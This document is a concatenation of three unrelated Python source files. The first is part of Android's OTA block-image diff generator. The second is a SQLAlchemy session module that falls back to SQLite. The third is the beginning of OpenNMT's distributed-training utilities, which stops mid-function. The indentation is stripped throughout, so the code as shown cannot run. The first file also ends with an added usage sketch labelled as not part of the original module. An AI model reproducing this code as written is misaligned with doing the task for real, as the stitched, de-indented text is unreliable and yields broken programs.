stashed_blocks += sr.size()
self.touched_src_ranges = self.touched_src_ranges.union(sr)
out.append("stash %s %s\n" % (sh, sr.to_string_raw()))
if stashed_blocks > max_stashed_blocks:
max_stashed_blocks = stashed_blocks
free_string = []
free_size = 0
if self.version == 1:
src_str = xf.src_ranges.to_string_raw() if xf.src_ranges else ""
elif self.version >= 2:
# <# blocks> <src ranges>
# OR
# <# blocks> <src ranges> <src locs> <stash refs...>
# OR
# <# blocks> - <stash refs...>
size = xf.src_ranges.size()
src_str = [str(size)]
unstashed_src_ranges = xf.src_ranges
mapped_stashes = []
for s, sr in xf.use_stash:
sid = stashes.pop(s)
unstashed_src_ranges = unstashed_src_ranges.subtract(sr)
sh = self.HashBlocks(self.src, sr)
sr = xf.src_ranges.map_within(sr)
mapped_stashes.append(sr)
if self.version == 2:
src_str.append("%d:%s" % (sid, sr.to_string_raw()))
# A stash will be used only once. We need to free the stash
# immediately after the use, instead of waiting for the automatic
# clean-up at the end. Because otherwise it may take up extra space
# and lead to OTA failures.
# Bug: 23119955
free_string.append("free %d\n" % (sid,))
free_size += sr.size()
else:
assert sh in stashes
src_str.append("%s:%s" % (sh, sr.to_string_raw()))
stashes[sh] -= 1
if stashes[sh] == 0:
free_size += sr.size()
free_string.append("free %s\n" % (sh))
stashes.pop(sh)
heapq.heappush(free_stash_ids, sid)
if unstashed_src_ranges:
src_str.insert(1, unstashed_src_ranges.to_string_raw())
if xf.use_stash:
mapped_unstashed = xf.src_ranges.map_within(unstashed_src_ranges)
src_str.insert(2, mapped_unstashed.to_string_raw())
mapped_stashes.append(mapped_unstashed)
self.AssertPartition(RangeSet(data=(0, size)), mapped_stashes)
else:
src_str.insert(1, "-")
self.AssertPartition(RangeSet(data=(0, size)), mapped_stashes)
src_str = " ".join(src_str)
# all versions:
# zero <rangeset>
# new <rangeset>
# erase <rangeset>
#
# version 1:
# bsdiff patchstart patchlen <src rangeset> <tgt rangeset>
# imgdiff patchstart patchlen <src rangeset> <tgt rangeset>
# move <src rangeset> <tgt rangeset>
#
# version 2:
# bsdiff patchstart patchlen <tgt rangeset> <src_str>
# imgdiff patchstart patchlen <tgt rangeset> <src_str>
# move <tgt rangeset> <src_str>
#
# version 3:
# bsdiff patchstart patchlen srchash tgthash <tgt rangeset> <src_str>
# imgdiff patchstart patchlen srchash tgthash <tgt rangeset> <src_str>
# move hash <tgt rangeset> <src_str>
tgt_size = xf.tgt_ranges.size()
if xf.style == "new":
assert xf.tgt_ranges
assert tgt_size == WriteSplitTransfers(out, xf.style, xf.tgt_ranges)
total += tgt_size
elif xf.style == "move":
assert xf.tgt_ranges
assert xf.src_ranges.size() == tgt_size
if xf.src_ranges != xf.tgt_ranges:
if self.version == 1:
out.append("%s %s %s\n" % (
xf.style,
xf.src_ranges.to_string_raw(), xf.tgt_ranges.to_string_raw()))
elif self.version == 2:
out.append("%s %s %s\n" % (
xf.style,
xf.tgt_ranges.to_string_raw(), src_str))
elif self.version >= 3:
# take into account automatic stashing of overlapping blocks
if xf.src_ranges.overlaps(xf.tgt_ranges):
temp_stash_usage = stashed_blocks + xf.src_ranges.size()
if temp_stash_usage > max_stashed_blocks:
max_stashed_blocks = temp_stash_usage
self.touched_src_ranges = self.touched_src_ranges.union(
xf.src_ranges)
out.append("%s %s %s %s\n" % (
xf.style,
self.HashBlocks(self.tgt, xf.tgt_ranges),
xf.tgt_ranges.to_string_raw(), src_str))
total += tgt_size
elif xf.style in ("bsdiff", "imgdiff"):
assert xf.tgt_ranges
assert xf.src_ranges
if self.version == 1:
out.append("%s %d %d %s %s\n" % (
xf.style, xf.patch_start, xf.patch_len,
xf.src_ranges.to_string_raw(), xf.tgt_ranges.to_string_raw()))
elif self.version == 2:
out.append("%s %d %d %s %s\n" % (
xf.style, xf.patch_start, xf.patch_len,
xf.tgt_ranges.to_string_raw(), src_str))
elif self.version >= 3:
# take into account automatic stashing of overlapping blocks
if xf.src_ranges.overlaps(xf.tgt_ranges):
temp_stash_usage = stashed_blocks + xf.src_ranges.size()
if temp_stash_usage > max_stashed_blocks:
max_stashed_blocks = temp_stash_usage
self.touched_src_ranges = self.touched_src_ranges.union(
xf.src_ranges)
out.append("%s %d %d %s %s %s %s\n" % (
xf.style,
xf.patch_start, xf.patch_len,
self.HashBlocks(self.src, xf.src_ranges),
self.HashBlocks(self.tgt, xf.tgt_ranges),
xf.tgt_ranges.to_string_raw(), src_str))
total += tgt_size
elif xf.style == "zero":
assert xf.tgt_ranges
to_zero = xf.tgt_ranges.subtract(xf.src_ranges)
assert WriteSplitTransfers(out, xf.style, to_zero) == to_zero.size()
total += to_zero.size()
else:
raise ValueError("unknown transfer style '%s'\n" % xf.style)
if free_string:
out.append("".join(free_string))
stashed_blocks -= free_size
if self.version >= 2 and common.OPTIONS.cache_size is not None:
# Sanity check: abort if we're going to need more stash space than
# the allowed size (cache_size * threshold). There are two purposes
# of having a threshold here. a) Part of the cache may have been
# occupied by some recovery logs. b) It will buy us some time to deal
# with the oversize issue.
cache_size = common.OPTIONS.cache_size
stash_threshold = common.OPTIONS.stash_threshold
max_allowed = cache_size * stash_threshold
assert max_stashed_blocks * self.tgt.blocksize < max_allowed, \
'Stash size %d (%d * %d) exceeds the limit %d (%d * %.2f)' % (
max_stashed_blocks * self.tgt.blocksize, max_stashed_blocks,
self.tgt.blocksize, max_allowed, cache_size,
stash_threshold)
if self.version >= 3:
self.touched_src_sha1 = self.HashBlocks(
self.src, self.touched_src_ranges)
# Zero out extended blocks as a workaround for bug 20881595.
if self.tgt.extended:
assert (WriteSplitTransfers(out, "zero", self.tgt.extended) ==
self.tgt.extended.size())
total += self.tgt.extended.size()
# We erase all the blocks on the partition that a) don't contain useful
# data in the new image; b) will not be touched by dm-verity. Out of those
# blocks, we erase the ones that won't be used in this update at the
# beginning of an update. The rest would be erased at the end. This is to
# work around the eMMC issue observed on some devices, which may otherwise
# get starving for clean blocks and thus fail the update. (b/28347095)
all_tgt = RangeSet(data=(0, self.tgt.total_blocks))
all_tgt_minus_extended = all_tgt.subtract(self.tgt.extended)
new_dontcare = all_tgt_minus_extended.subtract(self.tgt.care_map)
erase_first = new_dontcare.subtract(self.touched_src_ranges)
if erase_first:
out.insert(0, "erase %s\n" % (erase_first.to_string_raw(),))
erase_last = new_dontcare.subtract(erase_first)
if erase_last:
out.append("erase %s\n" % (erase_last.to_string_raw(),))
out.insert(0, "%d\n" % (self.version,)) # format version number
out.insert(1, "%d\n" % (total,))
if self.version >= 2:
# version 2 only: after the total block count, we give the number
# of stash slots needed, and the maximum size needed (in blocks)
out.insert(2, str(next_stash_id) + "\n")
out.insert(3, str(max_stashed_blocks) + "\n")
with open(prefix + ".transfer.list", "wb") as f:
for i in out:
f.write(i)
if self.version >= 2:
self._max_stashed_size = max_stashed_blocks * self.tgt.blocksize
OPTIONS = common.OPTIONS
if OPTIONS.cache_size is not None:
max_allowed = OPTIONS.cache_size * OPTIONS.stash_threshold
print("max stashed blocks: %d (%d bytes), "
"limit: %d bytes (%.2f%%)\n" % (
max_stashed_blocks, self._max_stashed_size, max_allowed,
self._max_stashed_size * 100.0 / max_allowed))
else:
print("max stashed blocks: %d (%d bytes), limit: <unknown>\n" % (
max_stashed_blocks, self._max_stashed_size))
def ReviseStashSize(self):
print("Revising stash size...")
stashes = {}
# Create the map between a stash and its def/use points. For example, for a
# given stash of (idx, sr), stashes[idx] = (sr, def_cmd, use_cmd).
for xf in self.transfers:
# Command xf defines (stores) all the stashes in stash_before.
for idx, sr in xf.stash_before:
stashes[idx] = (sr, xf)
# Record all the stashes command xf uses.
for idx, _ in xf.use_stash:
stashes[idx] += (xf,)
# Compute the maximum blocks available for stash based on /cache size and
# the threshold.
cache_size = common.OPTIONS.cache_size
stash_threshold = common.OPTIONS.stash_threshold
max_allowed = cache_size * stash_threshold / self.tgt.blocksize
stashed_blocks = 0
new_blocks = 0
# Now go through all the commands. Compute the required stash size on the
    # fly. If a command requires more stash than is available, it deletes the
# stash by replacing the command that uses the stash with a "new" command
# instead.
for xf in self.transfers:
replaced_cmds = []
# xf.stash_before generates explicit stash commands.
for idx, sr in xf.stash_before:
if stashed_blocks + sr.size() > max_allowed:
# We cannot stash this one for a later command. Find out the command
# that will use this stash and replace the command with "new".
use_cmd = stashes[idx][2]
replaced_cmds.append(use_cmd)
print("%10d %9s %s" % (sr.size(), "explicit", use_cmd))
else:
stashed_blocks += sr.size()
# xf.use_stash generates free commands.
for _, sr in xf.use_stash:
stashed_blocks -= sr.size()
# "move" and "diff" may introduce implicit stashes in BBOTA v3. Prior to
# ComputePatches(), they both have the style of "diff".
if xf.style == "diff" and self.version >= 3:
assert xf.tgt_ranges and xf.src_ranges
if xf.src_ranges.overlaps(xf.tgt_ranges):
if stashed_blocks + xf.src_ranges.size() > max_allowed:
replaced_cmds.append(xf)
print("%10d %9s %s" % (xf.src_ranges.size(), "implicit", xf))
# Replace the commands in replaced_cmds with "new"s.
for cmd in replaced_cmds:
# It no longer uses any commands in "use_stash". Remove the def points
# for all those stashes.
for idx, sr in cmd.use_stash:
def_cmd = stashes[idx][1]
assert (idx, sr) in def_cmd.stash_before
def_cmd.stash_before.remove((idx, sr))
        # Add up the blocks that violate the space limit and print the total
        # number to screen later.
new_blocks += cmd.tgt_ranges.size()
cmd.ConvertToNew()
num_of_bytes = new_blocks * self.tgt.blocksize
print(" Total %d blocks (%d bytes) are packed as new blocks due to "
"insufficient cache size." % (new_blocks, num_of_bytes))
def ComputePatches(self, prefix):
print("Reticulating splines...")
diff_q = []
patch_num = 0
with open(prefix + ".new.dat", "wb") as new_f:
for xf in self.transfers:
if xf.style == "zero":
tgt_size = xf.tgt_ranges.size() * self.tgt.blocksize
print("%10d %10d (%6.2f%%) %7s %s %s" % (
tgt_size, tgt_size, 100.0, xf.style, xf.tgt_name,
str(xf.tgt_ranges)))
elif xf.style == "new":
for piece in self.tgt.ReadRangeSet(xf.tgt_ranges):
new_f.write(piece)
tgt_size = xf.tgt_ranges.size() * self.tgt.blocksize
print("%10d %10d (%6.2f%%) %7s %s %s" % (
tgt_size, tgt_size, 100.0, xf.style,
xf.tgt_name, str(xf.tgt_ranges)))
elif xf.style == "diff":
src = self.src.ReadRangeSet(xf.src_ranges)
tgt = self.tgt.ReadRangeSet(xf.tgt_ranges)
# We can't compare src and tgt directly because they may have
# the same content but be broken up into blocks differently, eg:
#
# ["he", "llo"] vs ["h", "ello"]
#
# We want those to compare equal, ideally without having to
# actually concatenate the strings (these may be tens of
# megabytes).
src_sha1 = sha1()
for p in src:
src_sha1.update(p)
tgt_sha1 = sha1()
tgt_size = 0
for p in tgt:
tgt_sha1.update(p)
tgt_size += len(p)
if src_sha1.digest() == tgt_sha1.digest():
# These are identical; we don't need to generate a patch,
# just issue copy commands on the device.
xf.style = "move"
if xf.src_ranges != xf.tgt_ranges:
print("%10d %10d (%6.2f%%) %7s %s %s (from %s)" % (
tgt_size, tgt_size, 100.0, xf.style,
xf.tgt_name if xf.tgt_name == xf.src_name else (
xf.tgt_name + " (from " + xf.src_name + ")"),
str(xf.tgt_ranges), str(xf.src_ranges)))
else:
# For files in zip format (eg, APKs, JARs, etc.) we would
# like to use imgdiff -z if possible (because it usually
# produces significantly smaller patches than bsdiff).
# This is permissible if:
#
# - imgdiff is not disabled, and
# - the source and target files are monotonic (ie, the
# data is stored with blocks in increasing order), and
# - we haven't removed any blocks from the source set.
#
# If these conditions are satisfied then appending all the
# blocks in the set together in order will produce a valid
# zip file (plus possibly extra zeros in the last block),
# which is what imgdiff needs to operate. (imgdiff is
# fine with extra zeros at the end of the file.)
imgdiff = (not self.disable_imgdiff and xf.intact and
xf.tgt_name.split(".")[-1].lower()
in ("apk", "jar", "zip"))
xf.style = "imgdiff" if imgdiff else "bsdiff"
diff_q.append((tgt_size, src, tgt, xf, patch_num))
patch_num += 1
else:
assert False, "unknown style " + xf.style
if diff_q:
if self.threads > 1:
print("Computing patches (using %d threads)..." % (self.threads,))
else:
print("Computing patches...")
diff_q.sort()
patches = [None] * patch_num
# TODO: Rewrite with multiprocessing.ThreadPool?
lock = threading.Lock()
def diff_worker():
while True:
with lock:
if not diff_q:
return
tgt_size, src, tgt, xf, patchnum = diff_q.pop()
patch = compute_patch(src, tgt, imgdiff=(xf.style == "imgdiff"))
size = len(patch)
with lock:
patches[patchnum] = (patch, xf)
print("%10d %10d (%6.2f%%) %7s %s %s %s" % (
size, tgt_size, size * 100.0 / tgt_size, xf.style,
xf.tgt_name if xf.tgt_name == xf.src_name else (
xf.tgt_name + " (from " + xf.src_name + ")"),
str(xf.tgt_ranges), str(xf.src_ranges)))
threads = [threading.Thread(target=diff_worker)
for _ in range(self.threads)]
for th in threads:
th.start()
while threads:
threads.pop().join()
else:
patches = []
p = 0
with open(prefix + ".patch.dat", "wb") as patch_f:
for patch, xf in patches:
xf.patch_start = p
xf.patch_len = len(patch)
patch_f.write(patch)
p += len(patch)
def AssertSequenceGood(self):
# Simulate the sequences of transfers we will output, and check that:
# - we never read a block after writing it, and
# - we write every block we care about exactly once.
# Start with no blocks having been touched yet.
touched = array.array("B", "\0" * self.tgt.total_blocks)
# Imagine processing the transfers in order.
for xf in self.transfers:
# Check that the input blocks for this transfer haven't yet been touched.
x = xf.src_ranges
if self.version >= 2:
for _, sr in xf.use_stash:
x = x.subtract(sr)
for s, e in x:
# Source image could be larger. Don't check the blocks that are in the
# source image only. Since they are not in 'touched', and won't ever
# be touched.
for i in range(s, min(e, self.tgt.total_blocks)):
assert touched[i] == 0
# Check that the output blocks for this transfer haven't yet
# been touched, and touch all the blocks written by this
# transfer.
for s, e in xf.tgt_ranges:
for i in range(s, e):
assert touched[i] == 0
touched[i] = 1
# Check that we've written every target block.
for s, e in self.tgt.care_map:
for i in range(s, e):
assert touched[i] == 1
def ImproveVertexSequence(self):
print("Improving vertex order...")
# At this point our digraph is acyclic; we reversed any edges that
# were backwards in the heuristically-generated sequence. The
# previously-generated order is still acceptable, but we hope to
# find a better order that needs less memory for stashed data.
# Now we do a topological sort to generate a new vertex order,
# using a greedy algorithm to choose which vertex goes next
# whenever we have a choice.
# Make a copy of the edge set; this copy will get destroyed by the
# algorithm.
for xf in self.transfers:
xf.incoming = xf.goes_after.copy()
xf.outgoing = xf.goes_before.copy()
L = [] # the new vertex order
# S is the set of sources in the remaining graph; we always choose
# the one that leaves the least amount of stashed data after it's
# executed.
S = [(u.NetStashChange(), u.order, u) for u in self.transfers
if not u.incoming]
heapq.heapify(S)
while S:
_, _, xf = heapq.heappop(S)
L.append(xf)
for u in xf.outgoing:
del u.incoming[xf]
if not u.incoming:
heapq.heappush(S, (u.NetStashChange(), u.order, u))
# if this fails then our graph had a cycle.
assert len(L) == len(self.transfers)
self.transfers = L
for i, xf in enumerate(L):
xf.order = i
def RemoveBackwardEdges(self):
print("Removing backward edges...")
in_order = 0
out_of_order = 0
lost_source = 0
for xf in self.transfers:
lost = 0
size = xf.src_ranges.size()
for u in xf.goes_before:
# xf should go before u
if xf.order < u.order:
# it does, hurray!
in_order += 1
else:
# it doesn't, boo. trim the blocks that u writes from xf's
# source, so that xf can go after u.
out_of_order += 1
assert xf.src_ranges.overlaps(u.tgt_ranges)
xf.src_ranges = xf.src_ranges.subtract(u.tgt_ranges)
xf.intact = False
if xf.style == "diff" and not xf.src_ranges:
# nothing left to diff from; treat as new data
xf.style = "new"
lost = size - xf.src_ranges.size()
lost_source += lost
print((" %d/%d dependencies (%.2f%%) were violated; "
"%d source blocks removed.") %
(out_of_order, in_order + out_of_order,
(out_of_order * 100.0 / (in_order + out_of_order))
if (in_order + out_of_order) else 0.0,
lost_source))
def ReverseBackwardEdges(self):
print("Reversing backward edges...")
in_order = 0
out_of_order = 0
stashes = 0
stash_size = 0
for xf in self.transfers:
for u in xf.goes_before.copy():
# xf should go before u
if xf.order < u.order:
# it does, hurray!
in_order += 1
else:
# it doesn't, boo. modify u to stash the blocks that it
# writes that xf wants to read, and then require u to go
# before xf.
out_of_order += 1
overlap = xf.src_ranges.intersect(u.tgt_ranges)
assert overlap
u.stash_before.append((stashes, overlap))
xf.use_stash.append((stashes, overlap))
stashes += 1
stash_size += overlap.size()
# reverse the edge direction; now xf must go after u
del xf.goes_before[u]
del u.goes_after[xf]
xf.goes_after[u] = None # value doesn't matter
u.goes_before[xf] = None
print((" %d/%d dependencies (%.2f%%) were violated; "
"%d source blocks stashed.") %
(out_of_order, in_order + out_of_order,
(out_of_order * 100.0 / (in_order + out_of_order))
if (in_order + out_of_order) else 0.0,
stash_size))
def FindVertexSequence(self):
print("Finding vertex sequence...")
# This is based on "A Fast & Effective Heuristic for the Feedback
# Arc Set Problem" by P. Eades, X. Lin, and W.F. Smyth. Think of
# it as starting with the digraph G and moving all the vertices to
# be on a horizontal line in some order, trying to minimize the
# number of edges that end up pointing to the left. Left-pointing
# edges will get removed to turn the digraph into a DAG. In this
# case each edge has a weight which is the number of source blocks
# we'll lose if that edge is removed; we try to minimize the total
# weight rather than just the number of edges.
# Make a copy of the edge set; this copy will get destroyed by the
# algorithm.
for xf in self.transfers:
xf.incoming = xf.goes_after.copy()
xf.outgoing = xf.goes_before.copy()
xf.score = sum(xf.outgoing.values()) - sum(xf.incoming.values())
# We use an OrderedDict instead of just a set so that the output
# is repeatable; otherwise it would depend on the hash values of
# the transfer objects.
G = OrderedDict()
for xf in self.transfers:
G[xf] = None
s1 = deque() # the left side of the sequence, built from left to right
s2 = deque() # the right side of the sequence, built from right to left
heap = []
for xf in self.transfers:
xf.heap_item = HeapItem(xf)
heap.append(xf.heap_item)
heapq.heapify(heap)
# Use OrderedDict() instead of set() to preserve the insertion order. Need
# to use 'sinks[key] = None' to add key into the set. sinks will look like
# { key1: None, key2: None, ... }.
sinks = OrderedDict.fromkeys(u for u in G if not u.outgoing)
sources = OrderedDict.fromkeys(u for u in G if not u.incoming)
def adjust_score(iu, delta):
iu.score += delta
iu.heap_item.clear()
iu.heap_item = HeapItem(iu)
heapq.heappush(heap, iu.heap_item)
while G:
# Put all sinks at the end of the sequence.
while sinks:
new_sinks = OrderedDict()
for u in sinks:
if u not in G: continue
s2.appendleft(u)
del G[u]
for iu in u.incoming:
adjust_score(iu, -iu.outgoing.pop(u))
if not iu.outgoing:
new_sinks[iu] = None
sinks = new_sinks
# Put all the sources at the beginning of the sequence.
while sources:
new_sources = OrderedDict()
for u in sources:
if u not in G: continue
s1.append(u)
del G[u]
for iu in u.outgoing:
adjust_score(iu, +iu.incoming.pop(u))
if not iu.incoming:
new_sources[iu] = None
sources = new_sources
if not G: break
# Find the "best" vertex to put next. "Best" is the one that
# maximizes the net difference in source blocks saved we get by
# pretending it's a source rather than a sink.
while True:
u = heapq.heappop(heap)
if u and u.item in G:
u = u.item
break
s1.append(u)
del G[u]
for iu in u.outgoing:
adjust_score(iu, +iu.incoming.pop(u))
if not iu.incoming:
sources[iu] = None
for iu in u.incoming:
adjust_score(iu, -iu.outgoing.pop(u))
if not iu.outgoing:
sinks[iu] = None
# Now record the sequence in the 'order' field of each transfer,
# and by rearranging self.transfers to be in the chosen sequence.
new_transfers = []
for x in itertools.chain(s1, s2):
x.order = len(new_transfers)
new_transfers.append(x)
del x.incoming
del x.outgoing
self.transfers = new_transfers
def GenerateDigraph(self):
print("Generating digraph...")
# Each item of source_ranges will be:
# - None, if that block is not used as a source,
# - an ordered set of transfers.
source_ranges = []
for b in self.transfers:
for s, e in b.src_ranges:
if e > len(source_ranges):
source_ranges.extend([None] * (e-len(source_ranges)))
for i in range(s, e):
if source_ranges[i] is None:
source_ranges[i] = OrderedDict.fromkeys([b])
else:
source_ranges[i][b] = None
for a in self.transfers:
intersections = OrderedDict()
for s, e in a.tgt_ranges:
for i in range(s, e):
if i >= len(source_ranges): break
# Add all the Transfers in source_ranges[i] to the (ordered) set.
if source_ranges[i] is not None:
for j in source_ranges[i]:
intersections[j] = None
for b in intersections:
if a is b: continue
# If the blocks written by A are read by B, then B needs to go before A.
i = a.tgt_ranges.intersect(b.src_ranges)
if i:
if b.src_name == "__ZERO":
# the cost of removing source blocks for the __ZERO domain
# is (nearly) zero.
size = 0
else:
size = i.size()
b.goes_before[a] = size
a.goes_after[b] = size
def FindTransfers(self):
"""Parse the file_map to generate all the transfers."""
def AddSplitTransfers(tgt_name, src_name, tgt_ranges, src_ranges,
style, by_id):
"""Add one or multiple Transfer()s by splitting large files.
For BBOTA v3, we need to stash source blocks for resumable feature.
However, with the growth of file size and the shrink of the cache
partition source blocks are too large to be stashed. If a file occupies
too many blocks, we split it into smaller pieces by getting multiple
Transfer()s.
The downside is that after splitting, we may increase the package size
since the split pieces don't align well. According to our experiments,
1/8 of the cache size as the per-piece limit appears to be optimal.
Compared to the fixed 1024-block limit, it reduces the overall package
size by 30% for volantis, and 20% for angler and bullhead."""
# Possibly split large files into smaller chunks.
pieces = 0
cache_size = common.OPTIONS.cache_size
split_threshold = 0.125
max_blocks_per_transfer = int(cache_size * split_threshold /
self.tgt.blocksize)
# Change nothing for small files.
if (tgt_ranges.size() <= max_blocks_per_transfer and
src_ranges.size() <= max_blocks_per_transfer):
Transfer(tgt_name, src_name, tgt_ranges, src_ranges, style, by_id)
return
while (tgt_ranges.size() > max_blocks_per_transfer and
src_ranges.size() > max_blocks_per_transfer):
tgt_split_name = "%s-%d" % (tgt_name, pieces)
src_split_name = "%s-%d" % (src_name, pieces)
tgt_first = tgt_ranges.first(max_blocks_per_transfer)
src_first = src_ranges.first(max_blocks_per_transfer)
Transfer(tgt_split_name, src_split_name, tgt_first, src_first, style,
by_id)
tgt_ranges = tgt_ranges.subtract(tgt_first)
src_ranges = src_ranges.subtract(src_first)
pieces += 1
# Handle remaining blocks.
if tgt_ranges.size() or src_ranges.size():
# Must be both non-empty.
assert tgt_ranges.size() and src_ranges.size()
tgt_split_name = "%s-%d" % (tgt_name, pieces)
src_split_name = "%s-%d" % (src_name, pieces)
Transfer(tgt_split_name, src_split_name, tgt_ranges, src_ranges, style,
by_id)
def AddTransfer(tgt_name, src_name, tgt_ranges, src_ranges, style, by_id,
split=False):
"""Wrapper function for adding a Transfer()."""
# We specialize diff transfers only (which covers bsdiff/imgdiff/move);
# otherwise add the Transfer() as is.
if style != "diff" or not split:
Transfer(tgt_name, src_name, tgt_ranges, src_ranges, style, by_id)
return
# Handle .odex files specially to analyze the block-wise difference. If
# most of the blocks are identical with only few changes (e.g. header),
# we will patch the changed blocks only. This avoids stashing unchanged
      # blocks while patching. We limit the analysis to files without size
      # changes only, to avoid increasing the OTA generation cost too much.
if (tgt_name.split(".")[-1].lower() == 'odex' and
tgt_ranges.size() == src_ranges.size()):
# 0.5 threshold can be further tuned. The tradeoff is: if only very
# few blocks remain identical, we lose the opportunity to use imgdiff
# that may have better compression ratio than bsdiff.
crop_threshold = 0.5
tgt_skipped = RangeSet()
src_skipped = RangeSet()
tgt_size = tgt_ranges.size()
tgt_changed = 0
for src_block, tgt_block in zip(src_ranges.next_item(),
tgt_ranges.next_item()):
src_rs = RangeSet(str(src_block))
tgt_rs = RangeSet(str(tgt_block))
if self.src.ReadRangeSet(src_rs) == self.tgt.ReadRangeSet(tgt_rs):
tgt_skipped = tgt_skipped.union(tgt_rs)
src_skipped = src_skipped.union(src_rs)
else:
tgt_changed += tgt_rs.size()
# Terminate early if no clear sign of benefits.
if tgt_changed > tgt_size * crop_threshold:
break
if tgt_changed < tgt_size * crop_threshold:
assert tgt_changed + tgt_skipped.size() == tgt_size
print('%10d %10d (%6.2f%%) %s' % (tgt_skipped.size(), tgt_size,
tgt_skipped.size() * 100.0 / tgt_size, tgt_name))
AddSplitTransfers(
"%s-skipped" % (tgt_name,),
"%s-skipped" % (src_name,),
tgt_skipped, src_skipped, style, by_id)
# Intentionally change the file extension to avoid being imgdiff'd as
# the files are no longer in their original format.
tgt_name = "%s-cropped" % (tgt_name,)
src_name = "%s-cropped" % (src_name,)
tgt_ranges = tgt_ranges.subtract(tgt_skipped)
src_ranges = src_ranges.subtract(src_skipped)
# Possibly having no changed blocks.
if not tgt_ranges:
return
# Add the transfer(s).
AddSplitTransfers(
tgt_name, src_name, tgt_ranges, src_ranges, style, by_id)
print("Finding transfers...")
empty = RangeSet()
for tgt_fn, tgt_ranges in self.tgt.file_map.items():
if tgt_fn == "__ZERO":
# the special "__ZERO" domain is all the blocks not contained
# in any file and that are filled with zeros. We have a
# special transfer style for zero blocks.
src_ranges = self.src.file_map.get("__ZERO", empty)
AddTransfer(tgt_fn, "__ZERO", tgt_ranges, src_ranges,
"zero", self.transfers)
continue
elif tgt_fn == "__COPY":
# "__COPY" domain includes all the blocks not contained in any
# file and that need to be copied unconditionally to the target.
AddTransfer(tgt_fn, None, tgt_ranges, empty, "new", self.transfers)
continue
elif tgt_fn in self.src.file_map:
# Look for an exact pathname match in the source.
AddTransfer(tgt_fn, tgt_fn, tgt_ranges, self.src.file_map[tgt_fn],
"diff", self.transfers, self.version >= 3)
continue
b = os.path.basename(tgt_fn)
if b in self.src_basenames:
# Look for an exact basename match in the source.
src_fn = self.src_basenames[b]
AddTransfer(tgt_fn, src_fn, tgt_ranges, self.src.file_map[src_fn],
"diff", self.transfers, self.version >= 3)
continue
b = re.sub("[0-9]+", "#", b)
if b in self.src_numpatterns:
# Look for a 'number pattern' match (a basename match after
# all runs of digits are replaced by "#"). (This is useful
# for .so files that contain version numbers in the filename
# that get bumped.)
src_fn = self.src_numpatterns[b]
AddTransfer(tgt_fn, src_fn, tgt_ranges, self.src.file_map[src_fn],
"diff", self.transfers, self.version >= 3)
continue
AddTransfer(tgt_fn, None, tgt_ranges, empty, "new", self.transfers)
def AbbreviateSourceNames(self):
for k in self.src.file_map.keys():
b = os.path.basename(k)
self.src_basenames[b] = k
b = re.sub("[0-9]+", "#", b)
self.src_numpatterns[b] = k
@staticmethod
def AssertPartition(total, seq):
"""Assert that all the RangeSets in 'seq' form a partition of the
'total' RangeSet (ie, they are nonintersecting and their union
equals 'total')."""
so_far = RangeSet()
for i in seq:
assert not so_far.overlaps(i)
so_far = so_far.union(i)
assert so_far == total
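# Hypothetical end-to-end usage sketch (not part of the original module):
# diff two in-memory images and write <prefix>.transfer.list, <prefix>.new.dat
# and <prefix>.patch.dat. common.OPTIONS (cache_size, stash_threshold) must be
# populated by the caller, as the OTA generation scripts normally do.
def _block_image_diff_example(prefix):
  src = DataImage("\0" * 4096 * 8)      # old partition contents (8 blocks)
  tgt = DataImage("\x01" * 4096 * 8)    # new partition contents
  diff = BlockImageDiff(tgt, src, threads=1, version=4)
  diff.Compute(prefix)                  # emits the transfer list and data files
  return diff.max_stashed_size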
|
session.py
|
import logging
import sys
import time
from threading import Thread
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy_utils import database_exists
from app.core import settings
from app.db import Base
from app.utils.decorators import use_callbacks
log = logging.getLogger(__name__)
class Session(sessionmaker):
"""Represents a database session."""
def __init__(self, use_sqlite: bool = False, **kw):
# Add a background task to try to connect to the database.
super().__init__(**kw)
self.engine = None
if use_sqlite:
# Manually call the error callback to use sqlite.
self.error_callback(BaseException("Using sqlite as stated."))
else:
thread = Thread(target=self.get_engine, args=(3, 1))
thread.daemon = True
thread.start()
def callback(self, pg_dns: str) -> None:
"""Execute when the pool is completed."""
log.info("Connection to the database successful.")
self.engine = create_engine(pg_dns)
self.kw["bind"] = self.engine
Base.metadata.create_all(self.engine, checkfirst=True)
def error_callback(self, error: BaseException) -> None:
"""Execute when the pool throws an error."""
log.info(error)
# Use sqlite if the connection to the database failed.
self.engine = create_engine(settings.sqlite_dns)
self.kw["bind"] = self.engine
Base.metadata.create_all(self.engine, checkfirst=True)
@use_callbacks
def get_engine(self, timeout: int, delay: int) -> str:
"""Get an engine depending on the settings db."""
for i in range(timeout):
log.debug(f"Connecting to database {'.' * (timeout - i)}")
if database_exists(settings.pg_dns):
return settings.pg_dns
time.sleep(delay)
raise ConnectionError("Could not connect to the database, using sqlite.")
if "pytest" in sys.modules:
settings.sqlite_dns = "sqlite:///pytest.sqlite3" # Use pytest.sqlite3
SessionLocal = Session(use_sqlite=True, autocommit=False, autoflush=False)
else:
SessionLocal = Session(autocommit=False, autoflush=False)
|
distributed.py
|
""" Pytorch Distributed utils
This piece of code was heavily inspired by the equivalent of Fairseq-py
https://github.com/pytorch/fairseq
"""
import os
import signal
import math
import pickle
import torch.distributed
from onmt.utils.misc import set_random_seed
from onmt.utils.logging import init_logger, logger
def is_master(opt, device_id):
return opt.gpu_ranks[device_id] == 0
def multi_init(opt, device_id):
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip=opt.master_ip,
master_port=opt.master_port)
dist_world_size = opt.world_size
torch.distributed.init_process_group(
backend=opt.gpu_backend, init_method=dist_init_method,
world_size=dist_world_size, rank=opt.gpu_ranks[device_id])
gpu_rank = torch.distributed.get_rank()
if not is_master(opt, device_id):
logger.disabled = True
return gpu_rank
def all_reduce_and_rescale_tensors(tensors, rescale_denom,
buffer_size=10485760):
"""All-reduce and rescale tensors in chunks of the specified size.
Args:
tensors: list of Tensors to all-reduce
rescale_denom: denominator for rescaling summed Tensors
buffer_size: all-reduce chunk size in bytes
"""
# buffer size in bytes, determine equiv. # of elements based on data type
buffer_t = tensors[0].new(
math.ceil(buffer_size / tensors[0].element_size())).zero_()
buffer = []
def all_reduce_buffer():
# copy tensors into buffer_t
offset = 0
for t in buffer:
numel = t.numel()
buffer_t[offset:offset+numel].copy_(t.view(-1))
offset += numel
# all-reduce and rescale
torch.distributed.all_reduce(buffer_t[:offset])
buffer_t.div_(rescale_denom)
# copy all-reduced buffer back into tensors
offset = 0
for t in buffer:
numel = t.numel()
t.view(-1).copy_(buffer_t[offset:offset+numel])
offset += numel
filled = 0
